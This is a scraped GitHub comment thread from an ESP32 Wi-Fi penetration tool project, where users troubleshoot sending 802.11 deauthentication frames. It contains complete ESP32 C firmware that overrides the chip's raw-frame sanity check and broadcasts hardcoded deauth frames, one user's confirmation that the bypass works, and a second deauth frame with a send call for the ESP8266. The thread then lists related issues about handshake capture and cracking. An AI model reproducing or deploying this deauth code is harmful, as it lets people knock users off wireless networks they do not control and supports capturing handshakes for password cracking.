Comments (3)
@risinek So I managed to get the ESP-IDF framework working in Platformio using Arduino as Component.
I am not familiar with the process for installing the esp-idf in Platformio, but I managed to get the Platformio version of the ESP-IDF here. The version I installed however translates to version 4.2 of the ESP-IDF. I could not find one for 4.1...so this might be contributing to the problem. Not sure.
I wrote a small demo code that initializes wifi, transmits 10 deauth frames, sleeps for 10 seconds, then reboots (See code below).
I run the code on my ESP32 but wireshark does not show any deauths being sent. I verified my wsl bypass is being called instead of the original by placing a printf in the method to show it is being called. I also verified my -zmuldefs
flag in my cmakelist is set properly by removing it, building, and seeing it fail with an error that there are multiple definitions of the sanity check function. I set the flag again then it built properly.
I just want to verify my source code so I can eliminate it as a possibility for this demo not working. I suspect if it is not an issue with my source then it is an issue with the version of the ESP-IDF I installed.
By the way, thank you for taking the time to help me out. I know this isn't necessarily related to your project, but this is the only other place I have see someone talking about getting an ESP32 to send deauthentication frames.
Code
#include <stdio.h>
#include "sdkconfig.h"
#include "freertos/FreeRTOS.h"
#include "freertos/task.h"
#include "esp_log.h"
#include "esp_err.h"
#include "esp_system.h"
#include "esp_spi_flash.h"
#include "esp_wifi.h"
#include "esp_wifi_types.h"
static uint8_t original_mac_ap[6];
const wifi_promiscuous_filter_t filt = {.filter_mask=WIFI_PROMIS_FILTER_MASK_MGMT | WIFI_PROMIS_FILTER_MASK_DATA};
static const uint8_t deauth_frame_default[] = {
0xc0, 0x00, 0x3a, 0x01,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xCE, 0xCC, 0x45, 0x69, 0xEB, 0x14,
0xCE, 0xCC, 0x45, 0x69, 0xEB, 0x14,
0xf0, 0xff, 0x02, 0x00
};
static void wifi_event_handler(void *event_handler_arg, esp_event_base_t event_base, int32_t event_id, void *event_data){
}
int ieee80211_raw_frame_sanity_check(int32_t arg, int32_t arg2, int32_t arg3){
printf("Sanity check bypass called!\n");
return 0;
}
void wsl_bypasser_send_raw_frame(const uint8_t *frame_buffer, int size){
esp_wifi_80211_tx(WIFI_IF_AP, frame_buffer, size, false);
}
static void wifi_init_apsta(){
wifi_init_config_t wifi_init_config = WIFI_INIT_CONFIG_DEFAULT();
esp_wifi_init(&wifi_init_config);
esp_wifi_set_promiscuous_filter(NULL);
esp_wifi_set_promiscuous(true);
esp_wifi_set_max_tx_power(78);
esp_wifi_set_storage(WIFI_STORAGE_RAM);
esp_wifi_set_mode(WIFI_MODE_APSTA);
esp_wifi_set_channel(11, WIFI_SECOND_CHAN_NONE);
esp_wifi_start();
}
void app_main(void)
{
printf("Hello world!\n");
printf("ESP-IDF version is: ");
printf(esp_get_idf_version());
printf("\n");
wifi_init_apsta();
sleep(0.1);
for (int i = 0; i < 10; i++) {
printf("Sending deauth...\n");
wsl_bypasser_send_raw_frame(deauth_frame_default, sizeof(deauth_frame_default));
sleep(1);
}
for (int i = 10; i >= 0; i--) {
printf("Restarting in %d seconds...\n", i);
vTaskDelay(1000 / portTICK_PERIOD_MS);
}
printf("Restarting now.\n");
fflush(stdout);
esp_restart();
}
Quick Update
After messing around with the Arduino IDE, I was able to send deauth frames. I can confirm the WSL bypass method does work on arduino esp32 v2.0.0 (esp-idf v4.4) and you CAN get the ESP32 to send deauth frames using the firmware written in the Arduino IDE.
from esp32-wifi-penetration-tool.
I'm not familiar with platformio unfortunately. I think one possibility is to precompile wsl_bypasser
from this repo and then link it while compiling using Platformio - e.g. like described here.
Second option may be to use same flag for linker like it's done in this repo in cmakefile as it seems doable based on this documentaion.
But like I said, I'm not familiar with platformio, so I'm just guessing it may work this way 🙈 When I will have spare time, I will learn more about platformio and try find a way.
from esp32-wifi-penetration-tool.
Hi risinek and justcallmekoko,
I am currently trying to write my own deauthenticator to flash onto the ESP8266 chip. I cannot get the deauth packet to send and am out of ideas as to where I am going wrong.
So far I run a web server and access point to be able to interact with the scanned wireless access points. Currently I am having a similar issue, where I am unable to send the deauth frame. When I bring up Wireshark I am not seeing any traffic. The frame is formatted almost exactly the same as yours, but slightly tweaked.
uint8_t deauth_frame[26] = { 0xc0, 0x00, 0x3a, 0x01, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xCE, 0xCC, 0x45, 0x69, 0xEB, 0x14, 0xCE, 0xCC, 0x45, 0x69, 0xEB, 0x14, 0xf0, 0xff, 0x02, 0x00 };
Currently I have the values hard coded, so I was thinking that could potentially be my problem. To send the packet I am using the below code (the same as you send it in your deauth_all code):
wifi_send_pkt_freedom(deauth_frame, 26, 0);
Do you have any ideas as to why this might not be working? Apologies for the unconventional way of asking, I wasn't sure how best to contact you. Unfortunately it seems a lot of similar questions on stack overflow have not been answered.
All the best.
from esp32-wifi-penetration-tool.
Related Issues (20)
- web interface HOT 2
- Header fields are too long for server to interpet HOT 2
- can't open 192.168.4.1 esp32-wifi-penetration-tool server
- Timeout issue HOT 4
- 5G HOT 1
- NOT an issue, More of an idea! HOT 1
- [BUG] frame_analyzer.h:12:10: fatal error: esp_event.h: No such file or directory
- ManagementAP accesspoint is toooo slow HOT 1
- Hashcat no hashes loaded from capture.hccapx HOT 2
- The code uploads succesfully but the AP doesnot show up HOT 2
- Add Beacon Spammer
- The pcap handshake does not contain a ESSID HOT 2
- The deauth attack is only work on WP2 wifi Security, WP3 wifi security cannot be penetrated... HOT 1
- Esp32-c3 install HOT 1
- how to fix this HOT 1
- Cant find ManagementAP
- error on build wih idf.py HOT 2
- How not to use the web interface HOT 1
- request for unlimitted attacks timeouts HOT 1
- unable to boot or bootloop, blinking led lights after uploading new rebuild .bin using ESP-IDF v4.1
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from esp32-wifi-penetration-tool.